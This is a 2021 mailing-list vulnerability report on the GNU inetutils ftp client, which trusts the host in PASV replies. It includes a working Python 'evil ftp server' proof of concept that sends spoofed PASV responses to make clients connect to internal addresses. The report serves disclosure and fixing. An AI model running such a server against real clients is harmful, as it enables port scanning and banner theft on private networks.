|
From: | ZeddYu Lu |
Subject: | scurity issue in inetutils ftp client |
Date: | Fri, 11 Jun 2021 17:46:13 +0800 |
https://hackerone.com/reports/1040166
The problem is ftp client trust the host from PASV response by default, A malicious server can trick ftp client into connecting back to a given IP address and port. This may make ftp client scan ports and extract service banner from private newwork.
After test FTP in inetutils GNU, I found the ftp client has the same problem.
Inetutils Version:
ftp (GNU inetutils) 2.0 Copyright (C) 2021 Free Software Foundation, Inc.
evil ftp server in python:
#!/usr/bin/env python3
import socketserver, threading, requests, subprocess,time, base64, secrets,sys, hashlib, os
class MyTCPHandler(socketserver.StreamRequestHandler):
def handle(self):
print('[+] connected', self.request, file=sys.stderr)
self.request.sendall(b'220 (vsFTPd 3.0.3)\r\n')
self.data = self.rfile.readline().strip().decode()
print(self.data, file=sys.stderr,flush=True)
self.request.sendall(b'230 Login successful.\r\n')
self.data = self.rfile.readline().strip().decode()
print(self.data, file=sys.stderr)
self.request.sendall(b'227 Entering Passive Mode (127,0,0,1,43,203)\r\n')
self.data = self.rfile.readline().strip().decode()
print(self.data, file=sys.stderr)
self.request.sendall(b'227 Entering Passive Mode (127,0,0,1,43,203)\r\n')
self.data = self.rfile.readline().strip().decode()
print(self.data, file=sys.stderr)
self.request.sendall(b'200 Switching to Binary mode.\r\n')
self.data = self.rfile.readline().strip().decode()
print(self.data, file=sys.stderr)
self.request.sendall(b'125 Data connection already open. Transfer starting.\r\n')
self.data = self.rfile.readline().strip().decode()
print(self.data, file=sys.stderr)
self.request.sendall(b'250 Requested file action okay, completed.')
exit()
def ftp_worker():
with socketserver.TCPServer(('0.0.0.0', 21), MyTCPHandler) as server:
while True:
server.handle_request()
threading.Thread(target=ftp_worker).start()
time.sleep(2)
Python also fix this issue this year. Maybe this will help you. https://bugs.python.org/issue43285
More impacts you could find in https://hackerone.com/reports/1040166
Snipaste_2021-06-11_15-40-46.png
Description: PNG image
[Prev in Thread] | Current Thread | [Next in Thread] |